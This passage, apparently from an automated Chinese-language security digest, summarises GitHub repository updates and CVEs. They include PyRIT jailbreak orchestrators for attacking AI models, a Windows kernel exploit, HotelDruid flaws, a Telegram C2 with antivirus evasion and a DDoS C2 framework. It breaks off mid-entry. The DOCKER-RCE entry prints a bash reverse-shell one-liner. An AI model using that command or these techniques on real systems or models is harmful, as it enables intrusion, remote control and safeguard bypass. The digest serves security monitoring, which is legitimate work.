该更新增加了对LLM安全风险的关注,并引入了实践案例,这对于AI安全研究和实践具有重要价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### codegate - CodeGate: AI应用安全增强
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [codegate](https://github.com/stacklok/codegate) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
CodeGate项目是一个专注于AI应用安全、工作空间和Muxing的工具。 本次更新增加了对CVE相关包信息的处理,具体包括: 1. 修改了 .github/workflows/import_packages.yml 工作流程,添加了 VULNERABLE_KEY 的获取和处理逻辑,用于下载 vulnerabe.jsonl 文件。 2. 修改了 scripts/import_packages.py 脚本,增加了对 vulnerable.jsonl 文件的处理逻辑,并创建了 cve_packages 表,用于存储具有高危或严重漏洞的包信息。 这表明该项目正在增强其识别和处理AI应用中潜在安全漏洞的能力,使其可以检测依赖项中的已知漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | CodeGate项目,专注于AI应用的安全、工作空间和Muxing。 |
|
|||
|
|
| 2 | 更新增加了对CVE(Common Vulnerabilities and Exposures)相关包信息的处理。 |
|
|||
|
|
| 3 | 修改了import_packages.py脚本,增加了vulnerable.jsonl的处理。 |
|
|||
|
|
| 4 | 修改了import_packages.yml工作流程,增加了vulnerable_packages的处理。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 更新在.github/workflows/import_packages.yml文件中,增加了从codegate-data-prod存储桶中获取vulnerable.jsonl文件的逻辑,并增加了VULNERABLE_KEY变量
|
|||
|
|
|
|||
|
|
> 更新在scripts/import_packages.py文件中,增加了对vulnerable.jsonl文件的解析处理,将数据加载到vectorDB中的cve_packages表中。 cve_packages表定义了name、version和type三个字段。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• vector-db
|
|||
|
|
• import_packages.py
|
|||
|
|
• .github/workflows/import_packages.yml
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
增加了CVE相关的包信息处理,提升了对AI应用潜在安全风险的识别能力,修复潜在漏洞的能力。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### PhishDeezNuts - AI-powered Gmail phishing detection
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [PhishDeezNuts](https://github.com/SusyBegula/PhishDeezNuts) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `Security Tool` |
|
|||
|
|
| 更新类型 | `Code and Documentation Update` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **4**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
This repository contains "PhishDeezNuts", an email security application designed to detect phishing attempts in Gmail inboxes. It uses machine learning, rule-based analysis, and Google's Gemini AI. The application integrates with Gmail for real-time scanning, URL/domain analysis, and sender credibility checks. Recent updates include improvements to the README.md file by fixing some display issues of the star history chart.
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | AI-powered phishing email detection using machine learning and Google Gemini AI. |
|
|||
|
|
| 2 | Integrates with Gmail for real-time scanning and automated monitoring. |
|
|||
|
|
| 3 | Employs multi-layered detection including rule-based analysis and URL/domain analysis. |
|
|||
|
|
| 4 | High relevance to the "AI+Security" search keyword, as it directly applies AI to solve a security problem. |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Utilizes a machine learning model (Random Forest) for phishing detection.
|
|||
|
|
|
|||
|
|
> Employs rule-based pattern detection alongside ML analysis.
|
|||
|
|
|
|||
|
|
> Integrates Google Gemini AI for more advanced analysis of complex phishing attempts.
|
|||
|
|
|
|||
|
|
> Uses OAuth2 for secure Gmail authentication.
|
|||
|
|
|
|||
|
|
> Backend built with Flask and frontend with React.js.
|
|||
|
|
|
|||
|
|
> Uses scikit-learn for ML model implementation.
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Gmail
|
|||
|
|
• Google Cloud Platform
|
|||
|
|
• Flask
|
|||
|
|
• React
|
|||
|
|
• scikit-learn
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
The project's core functionality is directly related to "AI+Security", using AI to detect phishing emails. It provides a novel approach by combining machine learning, rule-based systems and AI analysis to identify potential threats. The project is not a basic tool or a simple code repository, and provides tangible value related to security. The repository is also not a duplicate, and does not contain code with low quality.
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### auto-sec-gpt - AI汽车安全威胁建模工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [auto-sec-gpt](https://github.com/Majid-Mollaeefar/auto-sec-gpt) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `Security Research` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是AutoSecGPT,一个基于AI的工具,旨在帮助安全团队进行汽车应用相关的威胁建模,简化TARA(威胁分析和风险评估)过程。最近的更新修改了README.md文件和.files目录下的威胁和攻击模型文件。本次更新新增了对“Autonomous Driving System”和“Infotainment System”的威胁描述,更新了Unified Attack Model,添加了支持链接。总的来说,此次更新改进了威胁建模数据,完善了项目文档,提升了工具的实用性和信息完整性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | AI-powered threat modeling tool for automotive applications |
|
|||
|
|
| 2 | Updated threat and attack model data for automotive systems |
|
|||
|
|
| 3 | Enhanced support information in README |
|
|||
|
|
| 4 | Improved documentation and example usage |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 更新了.files/threats.json,增加了对“Autonomous Driving System”和“Infotainment System”的威胁描述,包括潜在后果
|
|||
|
|
|
|||
|
|
> 更新了.files/unified_attack_model.json,修改了原有的攻击模型内容,丰富了汽车安全威胁建模的细节。
|
|||
|
|
|
|||
|
|
> 更新了README.md,加入了对项目的支持方式说明,并且更新了项目的联系方式。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Automotive applications
|
|||
|
|
• Braking System
|
|||
|
|
• Autonomous Driving System
|
|||
|
|
• Infotainment System
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新了汽车系统的威胁模型,包含新的威胁和潜在后果描述,对于汽车安全研究具有一定价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### PyRIT - PyRIT框架新增合规编排器
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [PyRIT](https://github.com/Azure/PyRIT) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能增强/安全研究` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **63**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库更新主要集中在PyRIT框架的功能增强和优化,重点包括:
|
|||
|
|
|
|||
|
|
1. **新增Context Compliance Orchestrator:** 该编排器用于创建和发送提示,以测试生成式AI系统对上下文合规性的风险。该编排器可以生成一系列提示,以帮助识别AI系统中的风险。
|
|||
|
|
2. **改进Many Shot Jailbreak Orchestrator:** 此更新增加了对转换器的支持,这允许在提示发送到目标之前,对提示进行转换。
|
|||
|
|
3. **增强 PromptSendingOrchestrator, RolePlayOrchestrator和FlipAttackOrchestrator**: 增加了功能, 例如添加 NormalizerRequest的验证。
|
|||
|
|
4. **引入 SearchReplaceConverter:** 增加了SearchReplaceConverter,这是一个提示转换器,可以用于替换prompt中的内容,如空格替换等。
|
|||
|
|
|
|||
|
|
总体而言,这些更新增强了框架的灵活性和功能,使其能够更好地用于安全研究和风险评估。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增Context Compliance Orchestrator,用于在生成式AI系统中识别风险。 |
|
|||
|
|
| 2 | 改进了Many Shot Jailbreak Orchestrator,增加了对转换器的支持。 |
|
|||
|
|
| 3 | 更新了PromptSendingOrchestrator、RolePlayOrchestrator和FlipAttackOrchestrator,增加了功能。 |
|
|||
|
|
| 4 | 增加了SearchReplaceConverter,可用于替换prompt中的内容。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> ContextComplianceOrchestrator:添加了一个新的编排器, 通过使用 `context_description_instructions_path` 生成初始提示,并结合 `adversarial_chat` 生成后续轮次提示。
|
|||
|
|
|
|||
|
|
> ManyShotJailbreakOrchestrator: 增加了 PromptConverter 的支持, 增强了对提示的定制能力。
|
|||
|
|
|
|||
|
|
> PromptSendingOrchestrator: 添加了 NormalizerRequest 的验证, 增加了 get_prepended_conversation_async() 函数.
|
|||
|
|
|
|||
|
|
> RolePlayOrchestrator: 增加了 NormalizerRequest 的验证.
|
|||
|
|
|
|||
|
|
> SearchReplaceConverter: 实现了使用正则表达式进行字符串替换, 增强了Prompt转换能力.
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• PyRIT framework
|
|||
|
|
• Context Compliance Orchestrator
|
|||
|
|
• Many Shot Jailbreak Orchestrator
|
|||
|
|
• SearchReplaceConverter
|
|||
|
|
• PromptSendingOrchestrator
|
|||
|
|
• RolePlayOrchestrator
|
|||
|
|
• FlipAttackOrchestrator
|
|||
|
|
• prompt targets
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增Context Compliance Orchestrator和增强PromptSendingOrchestrator等功能,有助于提高对AI系统安全风险的识别和评估能力,属于安全功能的增强。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-21333 - vkrnlintvsp.sys堆溢出漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-21333 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 13:26:34 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-21333-POC](https://github.com/MrAle98/CVE-2025-21333-POC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该漏洞是针对vkrnlintvsp.sys驱动程序的堆溢出漏洞。相关仓库提供了POC,该POC利用WNF状态数据和I/O环IOP_MC_BUFFER_ENTRY来触发漏洞。攻击者可以通过覆盖I/O环缓冲区项实现任意内核读写,从而实现远程代码执行。README.md文档中详细描述了漏洞原理,利用方法以及使用该POC的限制。该POC在Windows 11 23h2上进行了测试,并且可能在24h2上也能运行。最近的提交更新了README.md,添加了漏洞描述和利用方式的细节,以及利用该POC的截图。该POC利用了_IOP_MC_BUFFER_ENTRY结构,通过用户控制的缓冲区溢出来覆盖内核中的指针,从而实现任意地址的读写。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 堆溢出漏洞 |
|
|||
|
|
| 2 | 通过覆盖I/O环缓冲区项实现任意读写 |
|
|||
|
|
| 3 | 利用WNF状态数据和I/O环IOP_MC_BUFFER_ENTRY |
|
|||
|
|
| 4 | POC已发布 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:vkrnlintvsp.sys驱动程序存在堆溢出漏洞,通过构造特定的数据,可以覆盖I/O环缓冲区项。
|
|||
|
|
|
|||
|
|
> 利用方法:利用WNF状态数据和I/O环IOP_MC_BUFFER_ENTRY,通过覆盖I/O环缓冲区项,实现任意内核读写,进而获得RCE。
|
|||
|
|
|
|||
|
|
> 修复方案:微软尚未发布补丁,需要关注官方更新。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• vkrnlintvsp.sys
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响Windows系统,且存在可用的POC。通过该漏洞可以实现任意内核读写,具有极高的危害性,满足RCE条件,且POC代码已公开,漏洞价值高。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-25749 - HotelDruid 弱密码策略漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-25749 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 12:34:43 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-25749-Weak-Password-Policy-in-HotelDruid-3.0.7](https://github.com/huyvo2910/CVE-2025-25749-Weak-Password-Policy-in-HotelDruid-3.0.7)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库揭示了HotelDruid 3.0.7及更早版本中存在的弱密码策略漏洞。由于缺乏密码强度要求,用户可以设置弱密码,导致系统易受暴力破解和凭证填充攻击。更新内容主要体现在README.md文档,详细描述了漏洞、影响、POC、分析、缓解措施等。README文档提供了多个测试用例,验证了弱密码被接受、常用密码被接受、密码可复用以及密码可快速更改等问题。该漏洞影响所有用户账户,包括管理员账户,增加了整体风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 缺乏密码强度策略,允许设置弱密码 |
|
|||
|
|
| 2 | 影响所有用户账户,包括管理员账户 |
|
|||
|
|
| 3 | 易受暴力破解和凭证填充攻击 |
|
|||
|
|
| 4 | 提供明确的POC测试用例 |
|
|||
|
|
| 5 | 高风险,可能导致未授权访问和数据泄露 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞源于HotelDruid 3.0.7及更早版本缺乏密码强度策略,允许设置弱密码。
|
|||
|
|
|
|||
|
|
> 攻击者可以通过暴力破解、凭证填充等方式利用此漏洞获取未经授权的访问。
|
|||
|
|
|
|||
|
|
> 修复方案包括强制密码复杂度要求、实施密码历史限制、强制最小密码生存期、提供密码强度反馈、以及审查默认管理凭证。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• HotelDruid 3.0.7 and earlier
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的HotelDruid系统,且有明确的受影响版本。README文档提供了详细的漏洞描述、影响分析和可复现的POC测试用例,明确说明了利用方法和风险,符合is_valuable为true的标准。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-25747 - HotelDruid 3.0.7 XSS 漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-25747 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 12:31:04 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-25747-HotelDruid-3-0-7-Reflected-XSS](https://github.com/huyvo2910/CVE-2025-25747-HotelDruid-3-0-7-Reflected-XSS)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了CVE-2025-25747的漏洞信息,该漏洞是HotelDruid 3.0.7版本中的Reflected XSS漏洞。攻击者可以构造恶意URL,在crea_backup.php的ripristina_backup参数中注入JavaScript代码。最新提交更新了README.md文件,详细描述了漏洞细节、影响、PoC以及缓解措施。PoC包括弹窗和跳转两种方式。漏洞影响范围包括会话劫持、钓鱼攻击、恶意代码注入等。代码分析说明了漏洞的触发条件和利用方法。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | HotelDruid 3.0.7 的 crea_backup.php 存在 Reflected XSS 漏洞 |
|
|||
|
|
| 2 | 攻击者可以通过构造恶意 URL 注入 JavaScript 代码 |
|
|||
|
|
| 3 | 漏洞利用需要已认证的用户会话 |
|
|||
|
|
| 4 | 攻击可能导致会话劫持、信息泄露等安全问题 |
|
|||
|
|
| 5 | 提供了PoC验证漏洞 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞存在于 crea_backup.php 文件的 ripristina_backup 参数,未对用户输入进行有效过滤和编码。
|
|||
|
|
|
|||
|
|
> 攻击者构造包含恶意 JavaScript 代码的 URL,诱导已认证用户访问。
|
|||
|
|
|
|||
|
|
> 修复方案包括输入验证、输出编码、CSP 和安全会话管理等。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• HotelDruid 3.0.7及更早版本
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
漏洞影响广泛,影响重要业务系统,有明确的利用方法和POC。可以通过注入JavaScript实现会话劫持、权限提升等严重安全问题。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### DOCKER-RCE - Docker RCE反弹shell
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [DOCKER-RCE](https://github.com/kristiyan-stefanov-dev/DOCKER-RCE) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `漏洞利用框架` |
|
|||
|
|
| 更新类型 | `新增RCE利用` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个Docker容器的配置,其中包含一个RCE漏洞利用的示例。更新内容是在Dockerfile中添加了反弹shell的命令。通过在容器内执行该命令,可以实现对攻击者控制的IP地址和端口的反向shell连接,从而实现远程代码执行(RCE)。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 包含RCE的Docker容器配置 |
|
|||
|
|
| 2 | 通过bash反弹shell实现RCE |
|
|||
|
|
| 3 | 利用Docker环境进行渗透测试 |
|
|||
|
|
| 4 | 与RCE关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Dockerfile配置包含RUN命令,该命令使用bash -i >& /dev/tcp/{ip}/{port} 0>&1来实现反弹shell
|
|||
|
|
|
|||
|
|
> 反弹shell允许攻击者通过受害者的Docker容器建立与攻击者控制的机器的交互式shell连接
|
|||
|
|
|
|||
|
|
> 该方法绕过了防火墙或其他网络限制,因为受害者主动发起连接
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Docker
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接展示了RCE漏洞的利用方式,与RCE关键词高度相关。虽然只是一个简单的反弹shell示例,但其直接演示了在Docker环境中利用RCE漏洞的方法,具有较高的研究价值和实践意义。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### PentesterLab - Go get RCE漏洞利用POC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [PentesterLab](https://github.com/elw0od/PentesterLab) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `新增漏洞利用代码` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是PentesterLab的一个练习,演示了CVE-2018-6574的RCE漏洞。更新的文件`main.go`实现了一个简单的go程序,利用CGO调用C代码,而C代码可能被用于触发RCE。整个流程展示了通过go get命令下载和执行恶意代码的可能性,说明了攻击者可以通过精心构造的包来控制目标系统。更新的内容主要是POC代码,用于触发漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 包含CVE-2018-6574的RCE漏洞利用代码 |
|
|||
|
|
| 2 | 使用了CGO技术进行代码注入 |
|
|||
|
|
| 3 | 针对go get命令的RCE漏洞进行演示 |
|
|||
|
|
| 4 | 与RCE关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用CGO技术,在go程序中嵌入C代码。
|
|||
|
|
|
|||
|
|
> 通过C代码执行任意命令,实现RCE。
|
|||
|
|
|
|||
|
|
> POC针对go get下载依赖时可能存在的漏洞进行演示
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• go
|
|||
|
|
• CGO
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接针对RCE漏洞进行演示,提供了漏洞利用代码,与搜索关键词高度相关。 仓库展示了利用go get下载恶意代码的方式实现RCE,具有实际的攻击价值和研究价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Go_TelegramAPI_C2 - Telegram API的C2工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Go_TelegramAPI_C2](https://github.com/faanross/Go_TelegramAPI_C2) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增功能` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个使用Telegram API进行通信的C2仿真工具,目前处于开发阶段。更新内容主要包括了新BotAPI的整合,以及尝试将可执行文件写入Windows Temp目录,试图绕过杀毒软件的检测。该项目试图实现一个C2工具,并使用Telegram API作为通信通道,这在一定程度上规避了传统的C2通信方式,增加了隐蔽性。因此,该项目具有一定的安全研究价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于Telegram API的C2工具 |
|
|||
|
|
| 2 | 尝试绕过杀毒软件 |
|
|||
|
|
| 3 | 使用Go语言实现 |
|
|||
|
|
| 4 | 与C2关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Go语言编写
|
|||
|
|
|
|||
|
|
> 通过Telegram API进行C2通信
|
|||
|
|
|
|||
|
|
> 尝试将可执行文件写入Windows Temp目录并运行
|
|||
|
|
|
|||
|
|
> 新BotAPI整合
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Telegram API
|
|||
|
|
• Go语言环境
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库与C2(Command and Control)关键词高度相关,目标是实现一个C2工具,并使用Telegram API进行隐蔽通信,具有一定的安全研究价值和潜在的攻击价值。项目虽然还在开发中,但提供了关于C2工具的实现思路和技术细节,值得关注。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### SentinelaNet - DDoS攻击C2框架,更新绕过方法
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [SentinelaNet](https://github.com/CirqueiraDev/SentinelaNet) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
SentinelaNet是一个C2框架,设计用于管理恶意软件,执行DDoS攻击。本次更新在README文档中更新了Payload,添加了UDP Flood Bypass的方法,这提高了攻击的隐蔽性,也说明了该框架的持续维护。同时移除Roblox UDP Flood,说明项目处于活跃维护状态。该更新增加了攻击能力,并改进了现有功能,具备较高的安全风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
